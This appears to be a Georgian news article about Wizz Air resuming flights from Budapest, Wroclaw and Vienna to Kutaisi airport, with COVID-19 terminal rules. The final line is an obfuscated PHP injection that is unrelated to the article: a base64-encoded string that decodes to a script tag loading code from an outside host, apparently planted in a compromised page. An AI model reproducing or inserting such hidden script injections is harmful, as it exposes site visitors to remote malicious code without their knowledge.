celsiusi
ავერსი საქკაბელი
ივნისიდან ქუთაისის საერთაშორისო აეროპორტში ვენა-ქუთაისი-ვენას, ბუდაპეშტი-ქუთაისი-ბუდაპეშტისა და ვროცლავი-ქუთაისი-ვროცლავის საჰაერო ხაზზე პირდაპირი რეგულარული ავიამიმოსვლა განახლდება.
 
როგორც WWW.BUSINESSTIME.GE-ის აეროპორტების გაერთიანებიდან აცნობეს, ცენტრალური და აღმოსავლეთ ევროპის ყველაზე სწრაფად მზარდი დაბალბიუჯეტური ავიაკომპანია Wizz Air დავით აღმაშენებლის სახელობის ქუთაისის საერთაშორისო აეროპორტში ბუდაპეშტიდან პანდემიის შემდეგ პირველ რეგულარულ პირდაპირი რეისს 19 ივნისს შეასრულებს, ვროცლავიდან - 26 ივნისს, ხოლო ვენიდან - 29 ივნისს განახორციელებს.
 
სამივე მიმართულებით რეისები კვირაში ორ-ორი სიხშირით შეასრულდება. ქვეყანაში არსებული ეპიდვითარების მიხედვით, სიხშირეებისა და მიმართულებების რაოდენობა ეტაპობრივად გაიზრდება.
 
როგორც საქართველოს აეროპორტების გაერთიანებაში განმარტავენ, დავით აღმაშენებლის სახელობის აეროპორტში ზაფხულის სანავიგაციო სეზონზე პირდაპირი რეგულარული რეისების განხორციელება COVID 19 პანდემიის პირობებში დაწესებული ყველა რეგულაციის სრული დაცვით მიმდინარეობს.
 
"მოხარულები ვართ, რომ რამდენიმე თვიანი პაუზის შემდეეგ, ქუთაისის საერთაშორისო აეროპორტი ნელნელა იტვირთება რეგულარული რეისებით. როგორც იცით, დღეს და ხვალ პოლონეთის ორი ქალაქის, გდანსკისა და კატოვიცეს მიმართულებით განახლდება ფრენები ქუთაისიდან. ივნისიდან გვემატება უკვე პოლონეთიდან მესამე მიმართულება - ვროცლავი, ასევე ბუდაპეშტისა და ვენის მიმართულებები, რაც იმას ნიშნავს, რომ ქუთაისიდან ახლა უკვე პირდაპირი საჰაერო გზით მოხვედრა ევროპის 6 ქვეყნის 9 ქალაქში, ხოლო ცენტრალური აზიის 3 ქალაქშია შესაძლებელი. ჩვენ ვმუშაობთ ავიაკომპანიებთან, რომ ზაფხულის სანავიგაციო სეზონზე ახალი მიმართულებები ეტაპობრივად, ეპიდსიტუაციიდან გამომდინარე დაამატონ", - განაცხადა აეროპორტების გაერთიანების დირექტორმა თამარ არჩუაძემ.
 
ქუთაისის საერთაშორისო აეროპორტში მგზავრთა უსაფრთხო გადაადგილებისთვის ეროვნული რეგულაციებით და ევროპის საავიაციო უსაფრთხოების სააგენტოს (EASA) მიერ გაცემული გაიდლაინები და რეკომენდაციების შესრულება სრულად უზრუნველყოფილია. არსებული რეგულაციების თანახმად, ტერმინალში დაიშვებიან მხოლოდ მგზავრები. ტერმინალში გამცილებლის შესვლა ნებადართულია მხოლოდ არასრულწლოვანისა და შშმ პირის თანხლების შემთხვევაში. პირბადის გარეშე ტერმინალში შესვლა აკრძალულია. მგზავრებს, რომლებსაც 37.5 ზე მეტი ტემპერატურა დაუფიქსირდებათ, ტერმინალში არ დაიშვებიან.
 
COVID 19-ის პანდემიის პერიოდში არსებული შეზღუდვებიდან გამომდინარე, ქუთაისის საერთაშორისო აეროპორტში მხოლოდ ჩარტერული, საწვრთნელი და არაკომერციული დაშვებები ხორციელდებოდა.
1204
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");